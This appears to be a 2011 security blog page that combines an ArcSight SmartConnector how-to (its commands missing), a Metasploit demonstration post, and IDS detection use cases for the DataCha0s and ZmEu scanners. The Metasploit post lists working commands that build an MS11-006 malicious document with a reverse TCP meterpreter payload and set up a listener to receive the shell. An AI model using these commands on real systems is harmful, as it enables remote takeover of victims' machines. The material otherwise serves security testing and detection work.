ArcSight SmartConnector commands and features

03/06/2011Event Management, Log ManagementArcSight, Logger, SmartConnectorwow

If you have download for free the ArcSight Logger L750MB version, follow the installation guideline under Centos and install Windows Snare with ArcSight Syslog SmartConnector, you have now an operational lab or production environment. In this post we will describe you some SmartConnector commands and features. These commands and features are not documented in the provided ArcSight Logger L750MB documentation.

Starting the SmartConnector

If you don’t have specify, during the setup, to run the SmartConnector as a service, you will ne to start it manually. To start the SmartConnector you need to go in the “$ARCSIGHT_HOME/current/bin” directory and execute the “arcsight” script for Linux, or “arcsight.bat” script under Windows, with the following argument.

Once started, to confirm that the SmartConnector is working properly, you will have to check these outputs.

ArcSight SmartConnector starting outputs

“Eps” will give you the actual EPS throughput, and “Evts” the total number of events how have been processed by the SmartConnector. “ET” and “HT” should have twice the “Up” value in order to validate the the SmartConnector connexion with the Logger is working properly. If they are any communication troubles between the SmartConnector and the Logger you will have these kind of outputs.

ArcSight SmartConnector and Logger communication troubles

Checking SmartConnector availability

To valide that the SmartConnector is up and running, you can use the following command.

If the SmartConnector is down, you will have this result.

This command will not validate that the communication between the SmartConnector and the Logger is up and running.

Restarting the SmartConnector

To restart the SmartConnector you will have to use the following command.

Stopping the SmartConnector

If you have start the SmartConnector in the standalone mode, a simple CTRL+C will terminate the activities. But you can also stop the activities with the following command :

Checking SmartConnector status

To check the complete SmartConnector status use the following command.

The output will provide you some useful informations about the SmartConnector activities (memory usage, agent type, agent version, processed events, EPS, last event processed date, etc.)

Checking SmartConnector DNS resolution

To verify that the SmartConnector is able to do DNS resolution you can execute the following command.

ArcSight Agent FlexAgent Regex Tester

ArcSight provide, with the SmartConnector, a tool how will permit you to create and test regex for your logs. SmartConnectors delivered for ArcSight Logger L750MB will not allow you to add FlexConnectors (custom agents), but you can still use this regex GUI for personal purposes. To start the regex GUI execute the following command.

For example, I have test the regex tool, with the following postfix log entry.

May 12 04:14:13 logger sendmail[3457]: p4C2EDU2003456: to=<[email protected]>, ctladdr=<[email protected]> (0/0), delay=00:00:00, xdelay=00:00:00, mailer=local, pri=31483, dsn=2.0.0, stat=Sent

The regex tester will provide you a solution on how to parse this log.

?Metasploit Meterpreter race condition against Emsisoft Anti-Malware?

29/05/2011MetasploitAnti-Virus, Emsisoftwow

This video will demonstrate you a race condition against Emsisoft Anti-Malware product. This race condition is due to design errors in Emsisoft Anti-Malware product.

We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.

As you will see, the installed “Emsisoft Anti-Malware” product will detect the attack, but to late. The meterpreter sessions is created and you have access to the system. The demonstrated product is an update-to-date Emsisoft Anti-Malware (Version : 5.1.0.10 – Signatures : 5,466,115).

Metasploit commands :

To create the msf.doc file to exploit MS11-06 vulnerability

use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

To listen for incoming meterpreter sessions

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j

Demonstration video :

SUC026 : DataCha0s Web Scanner/Robot

23/05/2011Opportunists, Use CasesBotnetwow

Use Case Reference : SUC026
Use Case Title : DataCha0s Web Scanner/Robot
Use Case Detection : IDS / HTTP logs
Attacker Class : Opportunists
Attack Sophistication : Unsophisticated
Source IP(s) : Random
Source Countries : Most of US and Brasil
Source Port(s) : Random
Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

DataCha0s bot.

Source(s) :

Emerging Threats SIG 2003616 triggers are :

The HTTP header should contain “DataCha0s” User Agent string. Example : User-Agent: DataCha0s/2.0
The source port could be any FROM EXTERNAL_NET in destination of an HOME_NET HTTP_PORTS.

1 Month TOP 10 source IPs for SIG 2003616

SUC025 : ZmEu exploit scanner

20/05/2011Opportunists, Use CasesBotnet, Database, phpMyAdmin, Scannerwow

Use Case Reference : SUC025
Use Case Title : ZmEu exploit scanner
Use Case Detection : IDS / HTTP logs
Attacker Class : Opportunists
Attack Sophistication : Unsophisticated
Identified tool(s) : ZmEu bot
Source IP(s) : Random
Source Countries : Random
Source Port(s) : Random
Destination Port(s) : 80/TCP, 443/TCP